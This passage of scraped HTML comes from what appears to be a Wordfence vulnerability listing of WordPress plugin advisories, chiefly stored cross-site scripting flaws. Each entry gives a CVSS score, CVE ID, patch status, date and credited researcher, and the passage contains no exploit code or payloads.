		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f257a9-d447-407c-83ae-3cc99254be3f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dedd24e6-ac0c-48cd-a76a-8fb61d2c3c0f" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;heading_size&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15730" target="_blank" rel="noopener noreferrer">							CVE-2026-15730						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dedd24e6-ac0c-48cd-a76a-8fb61d2c3c0f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77727d02-796b-4c5b-ad5d-d1c366760abc" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via gamipress_achievement Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16090" target="_blank" rel="noopener noreferrer">							CVE-2026-16090						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77727d02-796b-4c5b-ad5d-d1c366760abc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/402e10b4-84f0-4f93-a85c-037876d26e58" target="_blank" rel="noopener">GenerateBlocks &lt;= 2.3.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Dynamic Tag Injection in HTML Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13458" target="_blank" rel="noopener noreferrer">							CVE-2026-13458						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generateblocks" target="_blank" rel="noopener">GenerateBlocks</a> <span class="wfvr-software-slug">[generateblocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/21d84c9bfb9b111185328d94d86b38d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21d84c9bfb9b111185328d94d86b38d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener">Or Benit</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/402e10b4-84f0-4f93-a85c-037876d26e58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/463fea25-c793-42fc-a8a8-28d001978133" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt; 4.16.3 &#8211; Authenticated (Custom role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14318" target="_blank" rel="noopener noreferrer">							CVE-2026-14318						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/463fea25-c793-42fc-a8a8-28d001978133" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1e2397-72a8-464c-93c7-d518e6611149" target="_blank" rel="noopener">JetEngine &lt; 3.8.12 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14864" target="_blank" rel="noopener noreferrer">							CVE-2026-14864						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/axbqd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d0f05e7e98f9171e2b5739505d09fdc3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d0f05e7e98f9171e2b5739505d09fdc3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/axbqd" target="_blank" rel="noopener">axbqd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1e2397-72a8-464c-93c7-d518e6611149" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f346cc7-92ad-4f76-a71c-864c22ed56b5" target="_blank" rel="noopener">Kadence Blocks &lt;= 3.7.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;toggleIcon&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18435" target="_blank" rel="noopener noreferrer">							CVE-2026-18435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f346cc7-92ad-4f76-a71c-864c22ed56b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/620bd934-327e-4509-a5e0-b910654af29b" target="_blank" rel="noopener">Kadence Blocks &lt;= 3.7.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Identity Block Inner Image Content</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18062" target="_blank" rel="noopener noreferrer">							CVE-2026-18062						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/620bd934-327e-4509-a5e0-b910654af29b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd6469c-bf36-4a46-a899-8d5163df8935" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes &lt;= 10.0.9 &#8211; Authenticated (Custom role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14207" target="_blank" rel="noopener noreferrer">							CVE-2026-14207						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</a> <span class="wfvr-software-slug">[lifterlms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd6469c-bf36-4a46-a899-8d5163df8935" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5545aab7-da77-4404-90e8-7b3e413769b5" target="_blank" rel="noopener">Location Weather &lt;= 3.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66433" target="_blank" rel="noopener noreferrer">							CVE-2026-66433						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/location-weather" target="_blank" rel="noopener">Location Weather – WordPress Weather Forecast, Air Quality &amp; Weather Widget</a> <span class="wfvr-software-slug">[location-weather]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5545aab7-da77-4404-90e8-7b3e413769b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/277b8437-a215-445c-8257-b0ca3f36336d" target="_blank" rel="noopener">MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc. &lt;= 1.2.78.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66703" target="_blank" rel="noopener noreferrer">							CVE-2026-66703						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailoptin" target="_blank" rel="noopener">MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc.</a> <span class="wfvr-software-slug">[mailoptin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/277b8437-a215-445c-8257-b0ca3f36336d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ec3600-1e32-4871-a41f-ab42d7bded5d" target="_blank" rel="noopener">Narrative Publisher &lt;= 1.0.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16273" target="_blank" rel="noopener noreferrer">							CVE-2026-16273						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/narrative-so" target="_blank" rel="noopener">Narrative Publisher</a> <span class="wfvr-software-slug">[narrative-so]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez-francisco-jose-ramirez-vicente-and-inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d332300984f1d3c8df18ac3a611be66c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d332300984f1d3c8df18ac3a611be66c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez-francisco-jose-ramirez-vicente-and-inigo-sanchez-enciso" target="_blank" rel="noopener">Pablo González Pérez, Francisco José Ramírez Vicente and Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ec3600-1e32-4871-a41f-ab42d7bded5d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ca8ab94-45b8-4705-b23b-dbc743572121" target="_blank" rel="noopener">Newsletters &lt;= 4.15 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;link&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12939" target="_blank" rel="noopener noreferrer">							CVE-2026-12939						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ca8ab94-45b8-4705-b23b-dbc743572121" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/293abae5-a7fb-401f-af09-324a81ce8709" target="_blank" rel="noopener">Newsletters &lt;= 4.15 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;target&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12938" target="_blank" rel="noopener noreferrer">							CVE-2026-12938						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/293abae5-a7fb-401f-af09-324a81ce8709" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd84a7b1-76f3-4c01-a935-ffec4a48b61b" target="_blank" rel="noopener">Open User Map &lt;= 1.4.46 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66445" target="_blank" rel="noopener noreferrer">							CVE-2026-66445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">Open User Map – Interactive Leaflet Maps</a> <span class="wfvr-software-slug">[open-user-map]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
